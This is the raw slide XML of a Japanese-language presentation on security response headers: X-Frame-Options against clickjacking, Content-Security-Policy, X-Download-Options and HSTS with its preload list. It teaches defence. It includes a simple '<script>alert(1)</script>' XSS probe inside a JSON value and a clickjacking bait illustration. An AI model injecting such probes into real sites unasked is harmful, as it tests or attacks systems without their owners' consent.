          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="white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{ "message", "&lt;script&gt;alert(1)&lt;/script&gt;" }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Consolas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5827232"/>
            <a:ext cx="7560840" cy="369332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&lt;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script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 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src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="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api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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jsonp?cb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=callback"&gt;&lt;/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script</a:t>
            </a:r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&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D05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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>失敗する</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050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セキュリティ関係の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>レスポンスヘッダ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X-Frame-Options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4548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X-Frame-Options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クリックジャッキング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標的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サイトを透明に重ね、意図しないクリック等を引き起こす攻撃</a:t>
            </a:r>
          </a:p>
          <a:p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3491880" y="4365104"/>
            <a:ext cx="3600400" cy="2232248"/>
            <a:chOff x="3131840" y="3573016"/>
            <a:chExt cx="3600400" cy="2232248"/>
          </a:xfrm>
          <a:scene3d>
            <a:camera prst="isometricTopUp"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="正方形/長方形 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3131840" y="3573016"/>
              <a:ext cx="3600400" cy="223224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  <a:effectLst/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角丸四角形 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5076056" y="4077072"/>
              <a:ext cx="1296144" cy="432048"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 6834"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                    <a:shade val="30000"/>
                    <a:satMod val="115000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                    <a:shade val="67500"/>
                    <a:satMod val="115000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:lumMod val="6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</a:ln>
            <a:effectLst/>
            <a:sp3d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dirty="0" smtClean="0"/>
                <a:t>クリック</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
                <a:t>!!</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4796408" y="4725144"/>
            <a:ext cx="1512168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  <a:scene3d>
            <a:camera prst="isometricTopUp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347864" y="2924944"/>
            <a:ext cx="3600400" cy="2232248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="1">
            <a:blip r:embed="rId2" cstate="print">
              <a:alphaModFix amt="70000"/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln w="12700">
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
          <a:scene3d>
            <a:camera prst="isometricTopUp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44008" y="3284984"/>
            <a:ext cx="1512168" cy="5760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  <a:scene3d>
            <a:camera prst="isometricTopUp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407707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mtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>透明表示の</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0">
              <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
              <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>標的サイト</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US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259632" y="5517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mtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>罠サイト</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US">
              <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
              <a:ea typeface="メイリオ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491880" y="5350965"/>
            <a:ext cx="1954924" cy="576064"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:noFill/>
            <a:prstDash val="sysDash"/>
          </a:ln>
          <a:effectLst/>
          <a:scene3d>
            <a:camera prst="isometricTopUp"/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現金</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP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</a:br>
            <a:r>
              <a:rPr lang="ja-JP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プレゼント</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP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650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X-Frame-Options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クリックジャッキング対策</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe,frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等での埋め込みを禁止する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全</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ての埋め込みを禁止</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>同一オリジン以外からの埋め込みを禁止</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指定オリジン以外からの埋め込みを禁止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3142184"/>
            <a:ext cx="6624736" cy="369332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X-Frame-Options:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US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DENY</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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31640" y="4149080"/>
            <a:ext cx="6624736" cy="369332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X-Frame-Options:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US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SAMEORIGIN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49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31640" y="5229200"/>
            <a:ext cx="6624736" cy="369332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X-Frame-Options:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US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ALLOW-FROM http://example.jp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty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99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X-Frame-Options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X-Frame-Options: ALLOW-FROM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>http://example.jp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>からの埋込みのみ許可</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>ALLOW-FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>に指定できるオリジンはひとつだけ。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>複数のオリジンからの埋め込み許可はそのままではできない</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>のみスペース区切りで複数オリジンの指定可能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31640" y="2195572"/>
            <a:ext cx="6624736" cy="369332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X-Frame-Options:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US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ALLOW-FROM http://example.jp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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1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HTML5 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>調査報告 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>from JPCERT/CC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809328"/>
            <a:ext cx="8748464" cy="578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0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X-Frame-Options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ALLOW-FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>の複数オリジン対応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呼出し元オリジンごとに識別子を</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>に付与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31640" y="2636912"/>
            <a:ext cx="7272808" cy="646331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// http://parent.example.jp/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>上</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="92D050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&lt;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iframe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src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="http://child.example.jp/?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from=p1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"&gt;&lt;/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iframe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&gt;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331640" y="3429000"/>
            <a:ext cx="7272808" cy="2308324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92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># child.example.jp/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my $allows = { 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p1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=&gt; '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http://parent.example.jp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' };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my $from = $allows-&gt;{ $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>params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-&gt;{from} };</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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if( $from ){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   print "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X-Frame-Options: ALLOW-FROM $from\n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";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}else{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    print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"X-Frame-Options: </a:t>
            </a:r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DENY\n";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin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9896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セキュリティ関係の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>レスポンスヘッダ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Content-Security-Policy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06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Content-Security-Policy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ヘッダで指定されたソースからしか画像や</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>を読み込めなくする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lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>拡張や</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>FirefoxOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>アプリの開発時にイラッとするアレ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使いこなせば</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>も怖くないけれど、実際の運用は超たいへん</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1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2732727"/>
            <a:ext cx="7560840" cy="923330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Content-Security-Policy: default-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src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 'self'; image-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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/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*;</a:t>
            </a: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Content-Type: text/html; charset=utf-8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254102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セキュリティ関係の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>レスポンスヘッダ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X-Download-Options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1467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X-Download-Options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IE8</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以降でダウンロード時に「開く」ボタンを非表示</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図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133" y="4253448"/>
            <a:ext cx="3251835" cy="17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図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4541" y="4253448"/>
            <a:ext cx="3251835" cy="176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テキスト ボックス 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="2642749"/>
            <a:ext cx="7560840" cy="1477328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Content-Disposition: attachment; filename="index.html"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X-Download-Options: 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noopen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p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&lt;html&gt;&lt;script&gt;...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32132" y="6021288"/>
            <a:ext cx="325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X-Download-Options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なし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04540" y="6011996"/>
            <a:ext cx="325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X-Download-Options</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US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あり</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US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056892" y="5175813"/>
            <a:ext cx="714908" cy="216024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77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X-Download-Options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 smtClean="0"/>
              <a:t>ダウンロード時</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>「開く」ボタン非表示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添付ファイルによる蓄積型の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>を予防することができる</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>なコンテンツをユーザーが直接開くことができなくなるので、利便性は下がる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不特定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>多数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>のユーザーが添付ファイルを掲載できる</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>アプリでは一考の価値あり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095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4000" dirty="0"/>
              <a:t>セキュリティ関係の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>レスポンスヘッダ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Strict-Transport-Security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38955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Strict-Transport-Security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HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>を強</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>制するための指令</a:t>
            </a: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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>これ以降の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" err="1"/>
              <a:t>への</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>アクセスは</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>に置き換わる</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>max-age </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>は有効期間を秒数で指定</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>includeSubDomains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>が指定されるとサブドメインも対象</a:t>
            </a:r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2132856"/>
            <a:ext cx="7992888" cy="646331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Strict-Transport-Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 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max-age=15768000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49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27584" y="2923728"/>
            <a:ext cx="7992888" cy="646331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Strict-Transport-Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 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max-age=15768000; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>includeSubdomains</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00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Strict-Transport-Security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HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>サイトのみが</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Strict-Transpo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>rt-Security</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ヘッダを返す</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>はすでに汚染されているかもしれないので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Firefox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Chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>などは常に</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>で通信する </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>"preload HSTS" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>のリストを持っている</a:t>
            </a:r>
            <a:endParaRPr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27584" y="2566645"/>
            <a:ext cx="7992888" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="101540"/>
          </a:solidFill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prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p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Strict-Transport-Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>max-age=15768000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin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58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Strict-Transport-Security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 smtClean="0"/>
              <a:t>Preload HSTS list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>は常に</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>で通信する サイトのリストを持っている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申請すれば掲載してもらえる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常時</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>cybozu.com </a:t>
            </a:r>
            <a:r>
